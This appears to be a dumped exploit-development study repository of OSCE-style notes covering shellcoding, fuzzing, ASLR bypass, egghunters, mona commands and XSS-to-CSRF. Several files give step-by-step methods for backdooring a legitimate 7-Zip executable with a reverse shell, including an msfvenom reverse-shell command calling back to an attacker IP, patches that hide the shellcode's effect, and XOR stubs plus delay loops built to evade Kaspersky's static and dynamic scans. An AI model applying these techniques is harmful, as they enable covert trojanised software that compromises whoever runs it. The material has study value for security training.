fly. 3 | 4 | To give an example, say you have a file that your trying to hide from an antivirus. 5 | 6 | You could pack the file, but then the packer's signature might get detected. Whats another way you could get around it? 7 | Well you could try encrypt the packer's signature to get around the antivirus detection, 8 | but what obfuscating the file? 9 | Or how about encrypting only the sections that get detected? 10 | What if you don't include the payload in the file at all and instead download it from a remote source? 11 | What if you add in delays to the file's execution to hinder heriustics? 12 | What if you add delays and then split the program up into child processes that then report to one child process that kills the other children once it is done? 13 | 14 | Theres a lot of different ways to get to the answer. 15 | Depending on your situation you may need to be more or less creative and put in more or less effort, 16 | but there is almost always a way to get to the solution. You just have to be patient and willing to get the job done ;) 17 | -------------------------------------------------------------------------------- /Metasploit-EXITFUNC: -------------------------------------------------------------------------------- 1 | This EXITFUNC option effectively sets a function hash in the payload that specifies a 2 | DLL and function to call when the payload is complete. 3 | 4 | There are 4 different values for EXITFUNC : 5 | + none 6 | + seh 7 | + thread 8 | + process. 9 | 10 | 11 | Usually it is set to thread or process, which corresponds to the ExitThread or ExitProcess calls. 12 | "none" technique will calls GetLastError, effectively a no-op. 13 | The thread will then continue executing, allowing you to simply cat multiple payloads together to be run in serial. 14 | 15 | 16 | EXITFUNC will be useful in some cases where after you exploited a box, you need a clean exit, 17 | even unfortunately the biggest problem is that many payloads don’t have a clean execution path after the exitfunc. 18 | 19 | 20 | - SEH: 21 | This method should be used when there is a structured exception handler (SEH) that will restart the 22 | thread or process automatically when an error occurs. 23 | 24 | - THREAD: 25 | This method is used in most exploitation scenarios where the exploited process (e.g. IE) runs the shellcode 26 | in a sub-thread and exiting this thread results in a working application/system (clean exit) 27 | 28 | - PROCESS: 29 | This method should be used with multi/handler. 30 | This method should also be used with any exploit where a master process restarts it on exit. 31 | 32 | 33 | 34 | Source: https://www.hacking-tutorial.com/tips-and-trick/what-is-metasploit-exitfunc/ 35 | -------------------------------------------------------------------------------- /Shellcoding/Null-Free Byte Shellcode common instructions: -------------------------------------------------------------------------------- 1 | Writing clean shellcode (or null-free shellcode) is not hard even if you know the instructions that give you 2 | null bytes and how to avoid them. The most common instructions that give you null byte are “mov eax,XX”, 3 | “cmp eax,0” or “call Next” as you see on getting the delta. 4 | 5 | In the Table, you will see these common instructions with its equivalent bytes and how to avoid them. 6 | 7 | -------------------------------------------------------------------------------------------------- 8 | |Null-Byte ||| Instruction Binary |||Form Null Free Instruction ||| Binary Form | 9 | -------------------------------------------------------------------------------------------------- 10 | |mov eax,5 ||| B8 00000005 |||mov al,5 ||| B0 05 | 11 | -------------------------------------------------------------------------------------------------- 12 | |call next ||| E8 00000000 |||jmp next/call prev ||| EB 05/ E8 F9FFFFFF | 13 | -------------------------------------------------------------------------------------------------- 14 | |cmp eax,0 ||| 83F8 00 ||| test eax,eax ||| 85C0 | 15 | -------------------------------------------------------------------------------------------------- 16 | |mov eax,0 ||| B8 00000000 |||xor eax,eax |||33C0 | 17 | -------------------------------------------------------------------------------------------------- 18 | 19 | -------------------------------------------------------------------------------- /Fuzz/Boo-Fuzz/templates/BooFuzz_FTP.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from boofuzz import * 3 | def receive_banner(socket): 4 | socket.recv(1024) 5 | def main(): 6 | s_initialize("user") 7 | s_static("USER") 8 | s_static(" ") 9 | s_group("user", ['user']) 10 | #s_string("anonymous") 11 | s_static("\r\n") 12 | s_initialize("pass") 13 | s_static("PASS") 14 | s_static(" ") 15 | s_group("pass", ['password']) 16 | #s_string("password") 17 | s_static("\r\n") 18 | s_initialize("stor") 19 | s_static("STOR") 20 | s_static(" ") 21 | s_group("stor", ['A1']) 22 | #s_string("A1") 23 | s_static("\r\n") 24 | s_initialize("retr") 25 | s_static("RETR") 26 | s_static(" ") 27 | s_group("retr", ['A2']) 28 | #s_string("A2") 29 | s_static("\r\n") 30 | my_session = sessions.Session(sleep_time=0.2,session_filename='ftpfuzzing') 31 | my_connection = SocketConnection("192.168.1.23", 21, proto='tcp') 32 | my_target = sessions.Target(my_connection) 33 | my_session.add_target(my_target) 34 | my_session.pre_send = receive_banner 35 | my_session.connect(s_get("user")) # fuzz user def 36 | my_session.connect(s_get("user"), s_get("pass")) # send message with normal user field and muatate password def 37 | my_session.connect(s_get("pass"), s_get("stor")) # send messages with normal user field and password field and muatate Stor def 38 | my_session.connect(s_get("pass"), s_get("retr")) # send messages with normal user field and password field and muatate Retr def 39 | my_session.fuzz() 40 | if __name__ == "__main__": 41 | main() 42 | -------------------------------------------------------------------------------- /Exploiting-Cisco-Routers/MAC-Bypassing-ACL: -------------------------------------------------------------------------------- 1 | Understanding The Router’s ACL Logic 2 | 3 | An Access Control List blocks devices based on their IP address. 4 | - Router’s are considered layer 3 devices, meaning that they handle IP packets and pass it down to other layers for 5 | processing through encapsulation. 6 | - Your home router keeps an ARP table that associates every IP address with its corresponding MAC address. 7 | - When a request is being made from a device that has been blocked, the router inspects the packets and analyses 8 | the source IP address. 9 | - If the source IP address match what is on its ACL, then the traffic is blocked. 10 | - When new devices join a network, and the MAC address is not associated with any IP address, 11 | the new machine is given an unused IP address. 12 | - It is to say, that changing your MAC address will allow DHCP to provide your interface with a new IP address, 13 | therefore circumventing the applied restrictions. 14 | ---------------------------------------- 15 | Enabling ACL On The Router 16 | 17 | Many routers have unique builds. 18 | Enabling Access Controls may differ from router to router but the concept behind them are similar. 19 | 20 | ---------------------------------------- 21 | Changing Interface MAC Address 22 | 23 | - sudo apt-get install macchan 24 | - The following image displays our interface’s status (UP), IP address, and MAC address: 25 | - ifconfig wlan0 26 | - macchanger --show wlan0 27 | - ip a | grep wlan0 28 | - ifconfig wlan0 down 29 | - After that is done, we can continue. I will be changing my MAC from “74:e5:43:30:78:a7” to “74:e5:43:30:78:a1”: 30 | - macchanger -m 74:e5:43:30:78:a1 31 | - ifconfig wlan0 32 | - ifconfig wlan0 up 33 | 34 | ---------------------------------------- 35 | 36 | 37 | ---------------------------------------- 38 | 39 | ---------------------------------------- 40 | 41 | -------------------------------------------------------------------------------- /Shellcoding/API-Refresher: -------------------------------------------------------------------------------- 1 | APIs are functions like send(), recv() and connect(). 2 | Each group of functions is written inside a library. 3 | These libraries are written into files with extension (.dll). 4 | Every library specializes in a type of function like: winsock.dll is for network APIs like send() or recv(). 5 | And user32.dll is for windows APIs like MessageBoxA() and CreateWindow(). 6 | 7 | And kernel32.dll is for the core windows APIs. 8 | It has APIs like LoadLibrary() which loads any other library. 9 | And GetProcAddress() which gets the address of any API inside a library loaded in the memory. 10 | 11 | 12 | So, to reach any API, you must get the address of the kernel32.dll in the memory and have the ability 13 | to get any API inside it. 14 | 15 | While any application is being loaded in the memory, 16 | the Windows loads beside it the core libraries like kernel32.dll and ntdll.dll and saves the 17 | addresses of these libraries in a place in memory called Process Environment Block (PEB). 18 | So, we will retrieve the address of kernel32.dll from the PEB. 19 | 20 | mov eax,dword ptr fs:[30h] 21 | mov eax,dword ptr [eax+0Ch] 22 | mov ebx,dword ptr [eax+1Ch] 23 | mov ebx,dword ptr [ebx] 24 | mov esi,dword ptr [ebx+8h] 25 | 26 | The first line gets the PEB address from the FS segment register. 27 | And then, the second and third line gets the PEB->LoaderData->InInitializationOrderModuleList. 28 | 29 | The InInitializationOrderModuleList is a double linked list that contains the whole loaded modules (PE Files) 30 | in memory (like kernel32.dll, ntdll.dll and the application itself) with the imagebase, 31 | entrypoint and the filename of each one of them. 32 | 33 | The first entry that you will see in InInitializationOrderModuleList is ntdll.dll. 34 | To get the kernel32.dll, you must go to the next item in the list. 35 | So, in the fourth line, we get the next item with ListEntry->FLink. 36 | And at last, we get the imagebase from the available information about the DLL in the 5th line. 37 | 38 | 39 | 40 | Source: https://www.codeproject.com/Articles/325776/The-Art-of-Win32-Shellcoding 41 | -------------------------------------------------------------------------------- /Change-Offset-Rebased-Modules: -------------------------------------------------------------------------------- 1 | Source: http://www.securitysift.com/windows-exploit-development-part-3-changing-offsets-and-rebased-modules/ 2 | 3 | CHANGING EIP OFFSETS: 4 | 5 | Example: 6 | the exploit for ASX To MP3 Converter only worked if the m3u file was run from the root of the 7 | C:\ directory because the offset to EIP overwrite was dependent upon the file path. 8 | 9 | Previously: 10 | 26,121 bytes 4 bytes 18,852 bytes 227 bytes 4,796 11 | JUNK EIP NOPS SHELLCODE FILL (shellcode overflow) 12 | 13 | 14 | The offset to EIP (when the m3u file was located at the root of C:\) was 26,121 bytes. 15 | As we proved by moving our m3u file to the Desktop, a longer file path causes the EIP overwrite to move to the left 16 | into the Junk portion of the buffer (all A’s), thereby decreasing the size of the offset. 17 | 18 | The good thing is if the file path is the only influence over the offset, 19 | we should be able to predict exactly where the new offset will be given a particular path. 20 | 21 | Old path: C:\asx2mp3.m3u 22 | 23 | New path: 24 | C:\Documents and Settings\Administrator\Desktop\asx2mp3.m3u 25 | 26 | If you count the characters between C:\ and our m3u file, we get: 45. 27 | Adjust EIP by -45, giving us a new offset of 26,076. 28 | 29 | 30 | ------------------------------------------------------ 31 | ------------------------------------------------------ 32 | ------------------------------------------------------ 33 | 34 | REBASED APPLICATION MODULES 35 | 36 | EIP has clearly been overwritten with my chosen CALL EBX address (0x01C27228 from MSA2Mcodec00.dll) 37 | but the program doesn’t seem to recognize it as a valid address. 38 | 39 | This is because we used an address from a "rebased" application module (DLL). 40 | 41 | Options: 42 | 43 | 1) See if we can find another application module that doesn't implement rebasing (preferred) 44 | OR 45 | 2) Use an OS module. 46 | 47 | We can use mona plugin to examin the loaded modules more closely and see which ones implement rebasing: 48 | !mona find -type instr -s "call ebx" 49 | -------------------------------------------------------------------------------- /Sub-Encoding: -------------------------------------------------------------------------------- 1 | Let’s use the EAX register to perform all the stack placements and calculations. 2 | 3 | 1) We start by zero’ing out EAX 4 | AND EAX, 554E4D4A 5 | ADD EAX, 2A313235 6 | 7 | - How does this work? Take the values and convert them to binary. Add them together they all turn to 0000000000…. 8 | 9 | 10 | 2) Now, we need to locate our position in the stack. 11 | - This will hold the address of ESP in EAX. This will allow us to make relative memory calculations for expanding our encoded payload. 12 | o Push ESP onto the stack. (PUSH ESP) 13 | o POP it back into EAX (POP EAX) 14 | 15 | 3) We now want to get the stack aligned with the position of where we want to decode our shellcode. 16 | - Estimate where our encoded shellcode ends, this can be kept for last. 17 | o In this case, we know that our encoded shellcode will take up around 253 bytes. 18 | o ALSO remember, give a few extra bytes for safety. 19 | 20 | Where is ESP now? (A) 21 | Where do you want ESP to be? (B) (Where you want your carved normal shellcode to END) 22 | Subtract (A) - (B). 23 | Take the resuld and subencode it. 24 | SUB EAX, 25 | SUB EAX, 26 | SUB EAX, 27 | 28 | Now, move the stack pointer to that address as we start carving out our shellcode in memory and placing it on thestack. 29 | - Push the value of eax on the stack. (PUSH EAX) 30 | - Pop it back into ESP. (POP ESP) 31 | 32 | 33 | 34 | Now we are free to write our decoding shellcode. 35 | Take the original 32 byte egghunter shellcode and break it down to 8 sets of 4 bytes. 36 | Carve these bytes into the EAX register and push them onto the stack. 37 | 38 | Remember, down to up! The first 4 bytes we will right will be the last 4 bytes of the egghunter shellcode. (x75\xe7\xff\xe7) 39 | We need to put these bytes into a register (we will use EAX), then push them onto the stack. 40 | 41 | Proceed to do this with each line until the shellcode is fully formed on the stack. 42 | 43 | ZERO out eax, subtract the following values from it. Then push the value that is stored in EAX onto the stack. 44 | 45 | AND EAX, 46 | AND EAX, 47 | SUB EAX, 48 | SUB EAX, 49 | SUB EAX, 50 | PUSH EAX 51 | -------------------------------------------------------------------------------- /Bypass-AntiVirus/Bypass-Kaspersky-2017-XOR-Stub: -------------------------------------------------------------------------------- 1 | 2 | bypassing-kaspersky-antivirus-2018/ https://xavibel.com/2019/08/07/bypassing-kaspersky-antivirus-2018/ 3 | 4 | REMEMBER, sometimes you might need to encode more than one section to avoid being detected. 5 | For example, in the article, they had to encode the text, rdata, and data section to avoid detection. 6 | This means that he created 3 different decoders/encoders before pushing/jumping back to normal execution. 7 | 8 | Simple encoder: 9 | + 3 operation 10 | + An Addition 11 | + XOR 12 | + subtraction 13 | 14 | ENCODER: 15 | 16 | MOV EAX, {ADDRESS OF THE START OF WHERE YOU WANT TO ENCODE IT} 17 | ADD BYTE PTR DS:[EAX],12 18 | XOR BYTE PTR DS:[EAX],3E 19 | SUB BYTE PTR DS:[EAX],11 20 | INC EAX 21 | CMP EAX, {ADDRESS OF THE END OF WHERE YOU WANT TO ENCODE IT} 22 | JLE SHORT {BACK TO THE ADD INSTRUCTION} 23 | 24 | 25 | DECODER: 26 | 27 | MOV EAX, {ADDRESS OF THE START OF WHERE YOU WANT TO ENCODE IT} 28 | ADD BYTE PTR DS:[EAX],11 29 | XOR BYTE PTR DS:[EAX],3E 30 | SUB BYTE PTR DS:[EAX],12 31 | INC EAX 32 | CMP EAX, {ADDRESS OF THE END OF WHERE YOU WANT TO ENCODE IT} 33 | JLE SHORT {BACK TO THE ADD INSTRUCTION} 34 | 35 | 36 | GREAT, WE BYPASSED THE STATIC SCAN... NOW HOW DO WE PASS THE DYNAMIC SCAN? 37 | 38 | Add a delay to let some seconds pass while AV is scanning the file, we will reach the maximum time scan allowed for scanning a singel file and the scan is going to stop. 39 | 40 | Repeat this code 10 times before we execute the binary: 41 | (BEFORE YOUR REAL DECODERS) 42 | 43 | XOR EAX, EAX 44 | PUSHAD 45 | POPAD 46 | INC EAX 47 | CMP EAX,12341234 48 | JNZ SHORT ???????? 49 | NOP 50 | NOP 51 | NOP 52 | NOP 53 | XOR EAX, EAX 54 | PUSHAD 55 | POPAD 56 | INC EAX 57 | CMP EAX,12341234 58 | JNZ SHORT ???????? 59 | NOP 60 | NOP 61 | NOP 62 | NOPXOR EAX, EAX 63 | PUSHAD 64 | POPAD 65 | INC EAX 66 | CMP EAX,12341234 67 | JNZ SHORT ???????? 68 | NOP 69 | NOP 70 | NOP 71 | NOPXOR EAX, EAX 72 | PUSHAD 73 | POPAD 74 | INC EAX 75 | CMP EAX,12341234 76 | JNZ SHORT ???????? 77 | NOP 78 | NOP 79 | NOP 80 | NOPXOR EAX, EAX 81 | PUSHAD 82 | POPAD 83 | INC EAX 84 | CMP EAX,12341234 85 | JNZ SHORT ???????? 86 | NOP 87 | NOP 88 | NOP 89 | NOP 90 | 91 | etc. 92 | 93 | 94 | -------------------------------------------------------------------------------- /Useful-Links: -------------------------------------------------------------------------------- 1 | OSCE Study Plan: 2 | https://www.abatchy.com/2017/03/osce-study-plan 3 | 4 | CTP Summary: 5 | https://h0mbre.github.io/CTP_Summary/# 6 | 7 | OSCE pre: https://stacktrac3.co/category/osce-prep/ 8 | 9 | Loads of BO exploit codes in prep for OSCE: https://github.com/ihack4falafel/OSCE 10 | 11 | Exploit Development: 12 | 13 | X86 Assembly Short and Conditional Jump Cheat Sheet: https://vellosec.net/2018/08/x86-assembly-short-and-conditional-jump-cheat-sheet/ 14 | Using SHORT (two-byte) Relativite Jump Instructions: https://thestarman.pcministry.com/asm/2bytejumps.htm 15 | Jumping with Bad Characters: https://buffered.io/posts/jumping-with-bad-chars/ 16 | X86-JUMPS: http://www.unixwiz.net/techtips/x86-jumps.html 17 | Intel x86 Assembly Instruction Set Opcode Table: http://sparksandflames.com/files/x86InstructionChart.html 18 | 19 | Windows Exploit Development – Part 1: The Basics http://www.securitysift.com/windows-exploit-development-part-1-basics/ 20 | Windows Exploit Development – Part 2: Intro to Stack Based Overflows - http://www.securitysift.com/windows-exploit-development-part-2-intro-stack-overflow/ 21 | Windows Exploit Development – Part 3: Changing Offsets and Rebased Modules - http://www.securitysift.com/windows-exploit-development-part-3-changing-offsets-and-rebased-modules/ 22 | Windows Exploit Development – Part 4: Locating Shellcode With Jumps - http://www.securitysift.com/windows-exploit-development-part-4-locating-shellcode-jumps/ 23 | Windows Exploit Development – Part 5: Locating Shellcode With Egghunting - http://www.securitysift.com/windows-exploit-development-part-5-locating-shellcode-egghunting 24 | Windows Exploit Development – Part 6: SEH Exploits - http://www.securitysift.com/windows-exploit-development-part-6-seh-exploits 25 | 26 | Capt. Meelo ExploitDev category: https://captmeelo.com/category/exploitdev 27 | Purpl3 F-x Secur1ty OSCE Prep articles: https://purpl3f0xsec.tech/ 28 | 29 | Jump if Condition is Met: 30 | https://c9x.me/x86/html/file_module_x86_id_146.html 31 | 32 | https://xavibel.com/category/exploiting/ 33 | 34 | 35 | Bypassing ASLR on Windows: 36 | https://www.abatchy.com/2017/06/exploit-dev-101-bypassing-aslr-on.html 37 | 38 | Bypassing Anti-Virus: 39 | https://pentest.blog/art-of-anti-detection-1-introduction-to-av-detection-techniques/ 40 | https://pentest.blog/art-of-anti-detection-2-pe-backdoor-manufacturing/ 41 | 42 | 43 | 44 | Deeper dive into Windows Architecture: 45 | https://docs.microsoft.com/en-us/archive/blogs/hanybarakat/deeper-into-windows-architecture 46 | -------------------------------------------------------------------------------- /backdoorPE/User-Interaction+Codecaves: -------------------------------------------------------------------------------- 1 | Code Caves: 2 | 3 | Code caves are dead/empty blocks in a memory of a program which can be used to inject our own code. 4 | Instead of creating a new section, we could use existing code caves to implant our shellcode. 5 | We can find code caves of different sizes in almost of any PE. 6 | The size of the code cave does matter!. 7 | We would want a code cave to be larger than our shellcode so we could inject the shellcode without having to 8 | split it in smaller chunks. 9 | 10 | The first step is to find a code cave, Cave Miner is an optimal python script to find code caves, 11 | you need to provide the size of the cave as a parameter and it will show you all the code caves larger than that size. 12 | 13 | Cave Miner: https://github.com/Antonin-Deniau/cave_miner 14 | ---------------------------- 15 | Example: 16 | We got two code caves larger than 700 bytes, both of them contain enough space for our shellcode. 17 | - Note down the virtual address for both caves. (AKA starting address of the cave.) 18 | Later We will hijack the execution flow by jumping to the virtual addresses. 19 | We will be using both caves later, for now, we only require one cave to implant in our shellcode. 20 | We can see that the code cave is only readable, 21 | If the code cave is only readable: 22 | - Use LORDPE to make it writable and executable for it to execute our shellcode. 23 | 24 | Triggering Shellcode Upon user interaction 25 | 26 | we don’t want to hijack the execution flow right after the program is run. 27 | We want to let the program run normally and execute shellcode upon user interaction with a specific functionality 28 | 29 | - Open the 7zip program in Ollydbg 30 | - right click 31 | - search for 32 | - all reference text strings 33 | 34 | In reference strings we found an interesting string, a domain (http://www.7-zip.org). 35 | The memory address of this domain gets accessed when a user clicks on about > domain. 36 | 37 | Note that we can have multiple user interaction triggers that can be backdoored in a single program using the 38 | referenced strings found. For the sake of an example we are using the domain button on about page which upon 39 | click opens the website www.7-zip.org in browser. 40 | Our objective is to trigger shellcode whenever a user clicks on the domain button. 41 | 42 | - Restart program 43 | - Place breakpoint at the address of user interaction 44 | - run program 45 | - Change instruction: JMP 46 | 47 | We are redirected to an empty code cave. 48 | 49 | PUSHAD 50 | PUSHFD 51 | Shellcode.... 52 | restore stack.. 53 | POPFD 54 | POPAD 55 | Restore Execution Flow... 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | Source: https://haiderm.com/fully-undetectable-backdooring-pe-file/ 65 | -------------------------------------------------------------------------------- /ASLR/Buffer-Overflow: -------------------------------------------------------------------------------- 1 | 1. Abusing non-ASLR enabled libraries 2 | - Programmers make mistakes, to make full use of ASLR, all loaded libraries need to be supporting it. If a single module doesn’t you can make use of it by finding search that library for the needed instruction to jump to your shellcode. 3 | 4 | 2. Partial EIP overwrite 5 | - Since you control EIP, you also control how much of EIP you want to overwrite. As already mentioned, ASLR only randomizes the higher two bytes, what if you can make use of that and only overwrite the lower 2 bytes? 6 | 7 | - Example: DLL is loaded at 0xAABB0000, if you overwrite only the lower two bytes (thanks to small endianness) you can basically control EIP to jump anywhere in 0xAABB0000 to 0xAABBXXY. 8 | 9 | 10 | 2.1 Single byte overwrite 11 | - Sometimes a character gets appended to your string, for example a null byte. This will mess up with the previous technique as when you try to overwrite the lower 2 bytes of EIP it becomes 0xAA00XXYY instead of 0xAABBXXYY. 12 | - Although this limits the possibility of finding a proper instruction, you might still be able to get away with a single byte. 13 | 14 | Search in 0xAABB0000 to 0xAABB00FF for possible instructions that can be used to land you your shellcode. 256 combinations aren’t a lot so good luck with that. 15 | 16 | 3. Bruteforcing address space 17 | - Since we know that only the 2 higher bytes are randomized, what if we try to bruteforce all the possible combination? This method is risky (might crash the service), slow and adds a lot of overhead. 18 | 19 | Source: https://www.abatchy.com/2017/06/exploit-dev-101-bypassing-aslr-on.html 20 | 21 | ------------------------------------------------------ 22 | ASLR Bypass Strategy: 23 | - Stack 24 | + Leak one address 25 | + Calculate the distance between the leaked one and the one with your ineterest 26 | * BUFFER_ADDRESS - LEAKED_ADDRESS = OFFSET 27 | + Leak one address in your exploit 28 | * LEAKED_ADDRESS + OFFSET = LEAKED_ADDRESS 29 | + Calculate the OFFSET from the core dump! 30 | Library: 31 | + ldd first 32 | * Open that library with gdb 33 | * Print functions! 34 | * Prints offset 35 | Attacking Library 36 | + Attacking Library 37 | * Leak one library address 38 | * Find what is the base address (LEAK is BASE + SOME_OFFSET) 39 | * Calculate SYSTEM (LEAK – SOME_OFFSET + SYSTEM_OFFSET) 40 | 41 | Source: https://cand.unexploitable.systems/l/lab04/W4L2.pdf 42 | ------------------------------------------------------ 43 | 44 | 45 | 46 | 47 | 48 | 49 | -------------------------------------------------------------------------------- /Egghunter/Egghunter-AccessViolation: -------------------------------------------------------------------------------- 1 | - Look at the memory dump where this violation occured. 2 | - If you look closely, you’ll note that although we see the start of our shellcode (prefaced by “PWNDPWND”) 3 | the shellcode is not intact, which is what caused our exploit to crash. 4 | This corrupted version of our shellcode is the first to appear in memory and the Egghunter is 5 | not smart enough to know the difference — it’s only designed to execute the instructions after the first “PWNDPWND” it finds. 6 | An Egghunter exploit might still be possible, provided our shellcode resides intact somewhere in memory. 7 | 8 | We can use mona to find out: !mona find -s "PWNDPWND" 9 | 10 | The first two entries marked as “[Stack]” both appear in the previous screenshot and both are corrupted 11 | versions of our shellcode. That leaves the third entry from the Heap. Double-click that entry to view it in memory. 12 | 13 | Perfect, it’s intact. But how do we get our otherwise “dumb” Egghunter to skip the first two corrupted entries 14 | in memory and execute the third? We have a few choices. 15 | 16 | 1) Change the offset to the shellcode 17 | 2) Change the starting memory page of the Egghunter search 18 | 19 | -------- 20 | 21 | 1) Change the Shellcode Offset 22 | 23 | One of the simplest methods of addressing this problem is to “push” the shellcode further into 24 | memory so the early copies are never made and (hopefully) the first copy the Egghunter reaches is intact. 25 | This time the offset pushed the shellcode far enough into our buffer so that no corrupted copies were 26 | placed on the stack and only the intact copy from the heap remains. 27 | 28 | 29 | 30 | offset = A * 5000 31 | exploit = Junk + EIP + egghunter + offset + egg + nops + shell 32 | 33 | 2) Change the Starting Memory Page of the Egghunter 34 | If we can predict where the corrupted copies are going to reside, 35 | we can simply tell the Egghunter to start looking after those memory addresses. 36 | This could probably be done any number of ways, but for this demo I’ll use an existing register and the ADD instruction. 37 | 38 | From the previous mona search, we know both corrupted copies reside at 0x0012F1AC and 0x0012F31C 39 | so all we need to do is start our Egghunter after these addresses. 40 | To do so, we need to change the value of ebx before the first memory page is loaded. 41 | 42 | Launch the exploit as-is and pause execution at the very beginning of the the Egghunter routine to examine the stack. 43 | Specifically, look at ESP. 44 | We need to start beyond 0x0012F31C. 45 | Subtract ESP from that and you get: 0x190 or 400 decimal. 46 | Therefore we can load EDX with ESP and then add at 400+ to EDX to push the starting memory page beyond the corrupted shellcode. 47 | An updated version of the Egghunter is below. Note I had to break up the ADD EDX instruction to avoid NULLs. 48 | -------------------------------------------------------------------------------- /backdoorPE/Basic-New-Section-Method: -------------------------------------------------------------------------------- 1 | - Open Lord PE 2 | - Go to section header 3 | - add the section header (added .hello) at the bottom. 4 | - Add the Virtual size and Raw size 1000 bytes. Note that 1000 is in hexadecimal (4096 bytes decimal). 5 | - Make the section header executable as we have to place our Shellcode in this section so it has to be executable, 6 | writable and readable. 7 | - Save the file as original. 8 | - Use any hex editor to add 1000 hexademical bytes at the end of the file. 9 | - Verify the steps above worked: 10 | + Can you run the file normally now? 11 | + Is there a new section with proper size and permissions added? 12 | - Immunity --> Memory Section --> double click PE headers. 13 | Hijack execution FLow 14 | - Note down the first 5 opcodes, as will need them later when restoring the execution flow back. 15 | - Copy the setarting address of .hello section 16 | - Open the program in Immuntiy and replace the first opcode (Entry point) with JMP
17 | - Save 18 | - Open program, jump to newly created section: 19 | 20 | PUSHAD 21 | PUSHFD 22 | Shellcode.... 23 | restore stack.. 24 | POPFD 25 | POPAD 26 | Restore Execution Flow... 27 | 28 | 29 | We generate windows stageless reverse shellcode using the following arguments in mfsvenom 30 | msfvenom -p windows/shell_reverse_tcp LHOST=192.168.116.128 LPORT=8080 -a x86 --platform windows -f hex 31 | 32 | Modifying Shellcode: 33 | 34 | - At the end of the shellcode we see an opcode CALL EBP which terminates the execution of the program after shellcode 35 | is executed, and we don’t want the program execution to terminate, 36 | infact we want the program to function normally after the shellcode execution, 37 | for this reason we have to modify the opcode CALL EBP to NOP (no operation). 38 | 39 | - Another modification that needs to be made is due to the presence of a WaitForSingleObject in our shellcode. 40 | WaitForSignleObject function takes an argument in milliseconds and wait till that time before starting other threads. 41 | If the WaitForSignleObject function argument is -1 this means that it will wait infinite amount of t 42 | ime before starting other threads. 43 | Which simply means that if we execute the binary it will spawn a reverse shell but normal functionality of 7zip 44 | would halt till we close our reverse shell. 45 | This post helps in finding and fixing WaitForSignleObject. 46 | We simply need to modify opcode DEC INC whose value is -1 (Arugment for WaitForSignleObject) to NOP. 47 | 48 | - Next we need to POP register values off the stack (to restore the stack value pre-shellcode) using POPFD and POPAD 49 | at the end of shellcode. 50 | 51 | After POPFD and POPAD we need to add the 5 hijacked instructions 52 | (copied earlier in hijack execution flow) back, to make sure after shellcode execution our 7zip program functions normally. 53 | 54 | - Save 55 | 56 | 57 | Source: https://haiderm.com/fully-undetectable-backdooring-pe-file/ 58 | -------------------------------------------------------------------------------- /mona-cheat-sheet: -------------------------------------------------------------------------------- 1 | Looking to jump between bytes? 2 | What address are you located? 3 | What address do you want to jump to? 4 | Add or subtract those two together. (Difference example: 0xFFFFF69) 5 | Use mona to search for this! 6 | - Get the equivalent opcode of the instruction JMP 0xFFFFFF69 7 | !mona assemble -s "JMP 0xFFFFFF69" 8 | ------------------------------------------------------------------------------- 9 | Find offset locations: 10 | !mona findmsp 11 | ------------------------------------------------------------------------------ 12 | MONA FOR SUB/AND ENCODING: 13 | !mona encode -t alphanum -s '\x90\x90\xFF\xE2' 14 | ------------------------------------------------------------------------------ 15 | 16 | Use mona to find bad characters: 17 | 18 | !mona config -set workingfolder c:\logs\%p 19 | !mona bytearray 20 | !mona bytearray –cpb "\x00" 21 | 22 | !mona compare -f C:\logs\\bytearray.bin -a
23 | ------------------------------------------------------------------------------- 24 | The -o flag will tell Mona to ignore OS modules. 25 | !mona seh -o 26 | 27 | ------------------------------------------------------------------------------- 28 | Find instruction in specific DLL: 29 | !mona find -s " " -m example.dll 30 | 31 | ------------ 32 | Using ASCII: 33 | !mona jmp -r esp -cp ascii 34 | 35 | ------------------------------------------------------------------------------ 36 | 32-bit egghunter generate: 37 | !mona egg -t w00t -cpb “\x00” 38 | 39 | ------------------------------------------------------------------------------ 40 | POP POP RET: 41 | !mona seh 42 | 43 | !mona seh -cp ascii 44 | ----------------------------------------------------------------------------- 45 | ASLR: 46 | !mona noaslr 47 | ------------------------------------------------------------------------------ 48 | !mona seh -cp unicode 49 | ------------------------------------------------------------------------------ 50 | Tge way around SafeSEH! 51 | !mona jseh 52 | 53 | 54 | look for similar instructions outside the loaded modules. This is a good approach to bypass the SafeSEH memory protection. 55 | 56 | ------------------------------------------------------------------------------ 57 | 58 | 59 | Iwantmorepizza list: 60 | 61 | !mona findmsf: 62 | search various places for the Metasploit pattern, returning the resulting offset for all the matches 63 | 64 | !mona seh: 65 | search the memory for all the gadgets that we can use as Structured Exception Handler a 66 | nd automatically categorize them in the following groups depending on their properties: 67 | unicode (this will include unicode transforms as well) 68 | 69 | ascii 70 | asciiprint 71 | upper 72 | lower 73 | uppernum 74 | lowernum 75 | numeric 76 | alphanum 77 | nonull 78 | startswithnull 79 | 80 | !mona egg -t w00t: generate the traditional 32 bits egghunter 81 | 82 | !mona jmp -r : find all the gadget to perform a jmp into the specified register 83 | 84 | !mona cmp -a -f : it compares a chunk of memory with a specified file on disk in order to detected 85 | potential truncations or bad characters and displays a nice matrix to present the results. 86 | 87 | -------------- 88 | -------------------------------------------------------------------------------- /WebExploitation/Xss-To-CSRF: -------------------------------------------------------------------------------- 1 | Source: https://rileykidd.com/2013/09/09/using-xss-to-csrf/ 2 | 3 | We identify a target where the user can update their profile. 4 | 5 | However, this form is protected against against csrf attacks by 6 | implementing a random token which must be passed as part of the request as a hidden value, 7 | so we can’t simply post to the form. 8 | 9 | 10 | Update user profile: 11 |
12 | 13 | 14 | 15 |
16 | 17 | There are 2 possible branches of execution for the user attempting to update their profile, 18 | the csrf check is either passed with: 19 | - The valid token and the profile updated, CSRF CHECK PASSED 20 | - The token is invalid and the request ignored. INVALID CSRF TOKEN. FORM IGNORED. 21 | 22 | Given our xss vulnerability, this csrf check can by bypassed in 3 steps: 23 | 1) First request the form 24 | 2) Extract the valid csrf token 25 | 3) Finally submit the form using the valid csrf token 26 | 27 | 28 | We will utilise the XMLHttpRequest function in this example. 29 | Our function parameters include: 30 | - the url to send the request, 31 | - the type of request to send, 32 | - a callback function to handle the asynchronous response 33 | - any data to send along with the request. 34 | 35 | function request(url, type, callback, send){ 36 | var oReq = new XMLHttpRequest(); 37 | oReq.open(type, url, true); 38 | oReq.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); 39 | oReq.onload = callback; 40 | oReq.send(send); 41 | }; 42 | 43 | Using the above function, we set up our GET callback function to handle loading the form data. 44 | 45 | function getListener () { 46 | var el = document.createElement('div'); 47 | el.innerHTML = this.responseText; 48 | }; 49 